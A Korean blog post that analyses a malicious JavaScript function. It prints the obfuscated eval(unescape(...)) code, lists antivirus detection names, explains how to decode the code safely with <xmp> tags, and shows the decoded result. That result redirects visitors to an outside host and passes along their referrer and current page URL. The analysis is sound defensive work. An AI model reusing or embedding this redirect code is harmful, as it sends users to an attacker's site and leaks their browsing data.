티스토리 뷰

아래와 같은 악성 스크립트가 있다.

function s(rt)
{
 eval(unescape("uj%3Ddocument%3Bt%3D0%3Bvar1%3D5423%3Bvar2%3Dvar1%3Bv%3D%27mm.cn%27%3Bif%28var1%3D%3Dvar2%29document.location%3D%27http%3A%2F%2F491%27%2Bv%2B%27%2Fst%2F%3Fds%3D%27%2Brt%2B%27%26tm%3D%27%2Bt%2B%27%26pe%3D%27%2Bescape%28uj.referrer%29%2B%27%26oi%3D%27%2Bescape%28window.location.href%29%3B"));
}

AV 업체들의 진단은 아래와 같다.

Comodo                    Exploit.JS.Redirect.~N
Authentium                JS/Linker.BH
ViRobot                    Spyware.JS.Small.Do.322
Symantec                  Trojan.Malscript!html
Antiy-AVL                 Trojan/JS.Small
Ikarus                      Trojan-Downloader.JS.Small
a-squared                 Trojan-Downloader.JS.Small!IK
F-Secure                  Trojan-Downloader.JS.Small.oa
Kaspersky                 Trojan-Downloader.JS.Small.oa

파일 자체가 실행되는 것은 아니고, 다른 스크립트에서 함수 s 만 호출하는 것으로 생각된다.

이 스크립트의 내용을 확인하기 위해서는 'function s(rt)' 부분을 제외하고

eval( 과 unescape("~") 사이에 "<xmp>"+ 를 넣고 끝에 </xmp> 추가

이렇게 파싱해주면 원본 메시지가 나타난다.

[ 파싱을 위해 <xmp> 를 추가한 인코딩 데이터 ]
eval("<xmp>"+unescape("uj%3Ddocument%3Bt%3D0%3Bvar1%3D5423%3Bvar2%3Dvar1%3Bv%3D%27mm.cn%27%3Bif%28var1%3D%3Dvar2%29document.location%3D%27http%3A%2F%2F491%27%2Bv%2B%27%2Fst%2F%3Fds%3D%27%2Brt%2B%27%26tm%3D%27%2Bt%2B%27%26pe%3D%27%2Bescape%28uj.referrer%29%2B%27%26oi%3D%27%2Bescape%28window.location.href%29%3B")+"</xmp>");

[ 원본 메시지 ]
function s(rt)
{
uj=document;
t=0;
var1=5423;
var2=var1;
v='mm.cn';
if(var1==var2)
document.location='http://491'+v+'/st/?ds='+rt+'&tm='+t+'&pe='+escape(uj.referrer)+'&oi='+escape(window.location.href);
}

<xmp> 이외에도 <textarea> 도 가능하다고 들었는데, 다음에는 이것을 시도를 해봐야겠다.
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
«   2024/03   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31
글 보관함